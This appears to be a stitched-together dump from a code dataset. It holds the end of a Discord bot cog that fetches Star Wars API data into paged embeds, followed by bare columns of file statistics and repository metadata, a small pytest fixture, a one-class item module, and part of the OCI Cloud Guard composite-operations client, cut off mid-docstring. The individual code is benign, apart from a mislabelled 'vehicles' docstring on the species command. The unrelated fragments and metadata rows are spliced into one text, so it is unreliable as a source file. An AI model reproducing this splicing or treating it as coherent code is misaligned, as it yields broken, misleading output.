query = text["next"]
else:
break
persons_list = []
for person in data:
embed = discord.Embed(title=f"Person: {person['name']}", color=0x32CD32)
num = int(person["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in person.items():
if key in [
"name",
"homeworld",
"films",
"species",
"vehicles",
"starships",
"created",
"edited",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
homeworld_num = int(person["homeworld"].split(r"/")[-2])
embed.add_field(name="Homeworld", value=f"ID: {str(homeworld_num)}")
persons_list.append(embed)
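# sort the embeds numerically by the value stored in their "ID:" field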
persons_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, persons_list, DEFAULT_CONTROLS)
@_all_group.command()
async def planets(self, ctx):
"""Grabs all planets in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/planets"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
planets_list = []
for planet in data:
embed = discord.Embed(title=f"Planet: {planet['name']}", color=0x800080)
num = int(planet["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in planet.items():
if key in [
"name",
"residents",
"films",
"edited",
"created",
"url",
]:
continue
embed.add_field(name=key.replace("_", " ").title(), value=value.title())
planets_list.append(embed)
planets_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, planets_list, DEFAULT_CONTROLS)
@_all_group.command()
async def films(self, ctx):
"""Grabs all films in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/films"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
films_list = []
for film in data:
embed = discord.Embed(title=f"Film: {film['title']}", color=0xD2B48C)
num = int(film["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in film.items():
if key in [
"name",
"characters",
"planets",
"starships",
"vehicles",
"species",
"created",
"edited",
"url",
"opening_crawl",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
films_list.append(embed)
films_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, films_list, DEFAULT_CONTROLS)
@_all_group.command()
async def starships(self, ctx):
"""Grabs all starships in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/starships"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
starships_list = []
for starship in data:
embed = discord.Embed(title=f"Starship: {starship['name']}", color=0x000000)
num = int(starship["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in starship.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
starships_list.append(embed)
starships_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, starships_list, DEFAULT_CONTROLS)
@_all_group.command()
async def vehicles(self, ctx):
"""Grabs all vehicles in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/vehicles"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
vehicles_list = []
for vehicle in data:
embed = discord.Embed(title=f"Vehicle: {vehicle['name']}", color=0x228B22)
num = int(vehicle["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in vehicle.items():
if key in ["name", "films", "edited", "created", "url", "pilots"]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
vehicles_list.append(embed)
vehicles_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, vehicles_list, DEFAULT_CONTROLS)
@_all_group.command(name="species")
async def _all_species(self, ctx):
"""Grabs all vehicles in the star wars API.
This command does take a bit."""
async with ctx.typing():
data = []
query = "https://swapi.dev/api/species"
while True:
response = await self.session.get(query)
text = json.loads(await response.text())
data_two = text["results"]
data += data_two
if bool(text["next"]):
query = text["next"]
else:
break
species_list = []
for species in data:
embed = discord.Embed(title=f"Species: {species['name']}", color=0xD2B48C)
num = int(species["url"].split(r"/")[-2])
embed.add_field(name="ID:", value=str(num))
for key, value in species.items():
if key in [
"name",
"homeworld",
"films",
"people",
"edited",
"created",
"url",
]:
continue
value = value.title() if hasattr(value, "title") else value
embed.add_field(name=key.replace("_", " ").title(), value=value)
species_list.append(embed)
species_list.sort(
key=lambda x: int(
[field for field in x.to_dict()["fields"] if field["name"] == "ID:"][0][
"value"
]
)
)
await menu(ctx, species_list, DEFAULT_CONTROLS)
| 48.735967
| 100
| 0.458365
| 4,544
| 46,884
| 4.663072
| 0.057658
| 0.03398
| 0.041909
| 0.049743
| 0.846619
| 0.818963
| 0.806975
| 0.793903
| 0.753693
| 0.743688
| 0
| 0.012076
| 0.411825
| 46,884
| 961
| 101
| 48.786681
| 0.75631
| 0.023654
| 0
| 0.70575
| 0
| 0
| 0.123934
| 0
| 0
| 0
| 0.004379
| 0
| 0
| 1
| 0.003382
| false
| 0.002255
| 0.007892
| 0
| 0.027058
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97ef752b83e615d9888b7b7f8458da11f1907e90
| 159
|
py
|
Python
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | 7
|
2019-11-04T13:02:09.000Z
|
2021-09-16T11:36:16.000Z
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | 9
|
2019-12-04T14:46:47.000Z
|
2022-01-03T15:29:53.000Z
|
stubalyzer/conftest.py
|
kialo/stub-analyzer
|
db702a23abda64a3f8e8debf5e175f62732ce827
|
[
"MIT"
] | null | null | null |
import pytest
from testing.util import MypyNodeFactory, mypy_node_factory
@pytest.fixture
def mypy_nodes() -> MypyNodeFactory:
return mypy_node_factory
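# Usage sketch (hypothetical test name; pytest injects the fixture by parameter name):
#
#   def test_example(mypy_nodes: MypyNodeFactory) -> None:
#       ...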
| 17.666667
| 59
| 0.811321
| 20
| 159
| 6.2
| 0.65
| 0.129032
| 0.241935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132075
| 159
| 8
| 60
| 19.875
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
3f162555af2967f4dc9f7914c4f057f23bf0e254
| 121
|
py
|
Python
|
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/items/jewelry/base.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.items.base import Item
from bflib.items import listing
@listing.register_type
class Jewelry(Item):
pass
| 15.125
| 33
| 0.785124
| 18
| 121
| 5.222222
| 0.666667
| 0.191489
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14876
| 121
| 7
| 34
| 17.285714
| 0.912621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
3f2a37489eb60d8ee21ccc8ecc329c6cb23cf780
| 51,397
|
py
|
Python
|
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/cloud_guard/cloud_guard_client_composite_operations.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class CloudGuardClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.cloud_guard.CloudGuardClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new CloudGuardClientCompositeOperations object
:param CloudGuardClient client:
The service client which will be wrapped by this object
"""
self.client = client
def create_data_mask_rule_and_wait_for_state(self, create_data_mask_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateDataMaskRuleDetails create_data_mask_rule_details: (required)
Definition for the new Data Mask Rule.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_data_mask_rule(create_data_mask_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_mask_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_detector_recipe_and_wait_for_state(self, create_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateDetectorRecipeDetails create_detector_recipe_details: (required)
Details for the new DetectorRecipe.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_detector_recipe(create_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_managed_list_and_wait_for_state(self, create_managed_list_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateManagedListDetails create_managed_list_details: (required)
Details for the new ManagedList.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_managed_list(create_managed_list_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_managed_list(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_responder_recipe_and_wait_for_state(self, create_responder_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateResponderRecipeDetails create_responder_recipe_details: (required)
Details for ResponderRecipe.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_responder_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_responder_recipe(create_responder_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_responder_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_target_and_wait_for_state(self, create_target_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param oci.cloud_guard.models.CreateTargetDetails create_target_details: (required)
Details for the new Target.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_target(create_target_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_target_detector_recipe_and_wait_for_state(self, target_id, attach_target_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.create_target_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.TargetDetectorRecipe` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param oci.cloud_guard.models.AttachTargetDetectorRecipeDetails attach_target_detector_recipe_details: (required)
Details for associating DetectorRecipe to Target
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.TargetDetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.create_target_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_target_detector_recipe(target_id, attach_target_detector_recipe_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_target_detector_recipe(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_data_mask_rule_and_wait_for_state(self, data_mask_rule_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param str data_mask_rule_id: (required)
OCID of dataMaskRule
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_data_mask_rule(data_mask_rule_id)
operation_result = None
try:
operation_result = self.client.delete_data_mask_rule(data_mask_rule_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_detector_recipe_and_wait_for_state(self, detector_recipe_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
to enter the given state(s).
:param str detector_recipe_id: (required)
DetectorRecipe OCID
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DetectorRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_detector_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_detector_recipe(detector_recipe_id)
operation_result = None
try:
operation_result = self.client.delete_detector_recipe(detector_recipe_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_managed_list_and_wait_for_state(self, managed_list_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_managed_list` and waits for the :py:class:`~oci.cloud_guard.models.ManagedList` acted upon
to enter the given state(s).
:param str managed_list_id: (required)
The cloudguard list OCID to be passed in the request.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ManagedList.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_managed_list`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_managed_list(managed_list_id)
operation_result = None
try:
operation_result = self.client.delete_managed_list(managed_list_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_responder_recipe_and_wait_for_state(self, responder_recipe_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_responder_recipe` and waits for the :py:class:`~oci.cloud_guard.models.ResponderRecipe` acted upon
to enter the given state(s).
:param str responder_recipe_id: (required)
OCID of ResponderRecipe
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.ResponderRecipe.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_responder_recipe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_responder_recipe(responder_recipe_id)
operation_result = None
try:
operation_result = self.client.delete_responder_recipe(responder_recipe_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_target_and_wait_for_state(self, target_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.delete_target` and waits for the :py:class:`~oci.cloud_guard.models.Target` acted upon
to enter the given state(s).
:param str target_id: (required)
OCID of target
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.Target.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.delete_target`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_target(target_id)
operation_result = None
try:
operation_result = self.client.delete_target(target_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_data_mask_rule_and_wait_for_state(self, data_mask_rule_id, update_data_mask_rule_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_data_mask_rule` and waits for the :py:class:`~oci.cloud_guard.models.DataMaskRule` acted upon
to enter the given state(s).
:param str data_mask_rule_id: (required)
OCID of dataMaskRule
:param oci.cloud_guard.models.UpdateDataMaskRuleDetails update_data_mask_rule_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.cloud_guard.models.DataMaskRule.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.cloud_guard.CloudGuardClient.update_data_mask_rule`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_data_mask_rule(data_mask_rule_id, update_data_mask_rule_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_mask_rule(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
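# Illustrative usage of the update-and-wait pattern above -- a minimal sketch,
# not part of the generated SDK. `composite` is assumed to be a
# CloudGuardClientCompositeOperations instance and `details` a populated
# oci.cloud_guard.models.UpdateDataMaskRuleDetails; the OCID is a placeholder.
#
#     response = composite.update_data_mask_rule_and_wait_for_state(
#         'ocid1.cloudguarddatamaskrule.oc1..example',
#         details,
#         wait_for_states=['ACTIVE'],
#         waiter_kwargs={'max_wait_seconds': 300})
#     print(response.data.lifecycle_state)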
def update_detector_recipe_and_wait_for_state(self, detector_recipe_id, update_detector_recipe_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.cloud_guard.CloudGuardClient.update_detector_recipe` and waits for the :py:class:`~oci.cloud_guard.models.DetectorRecipe` acted upon
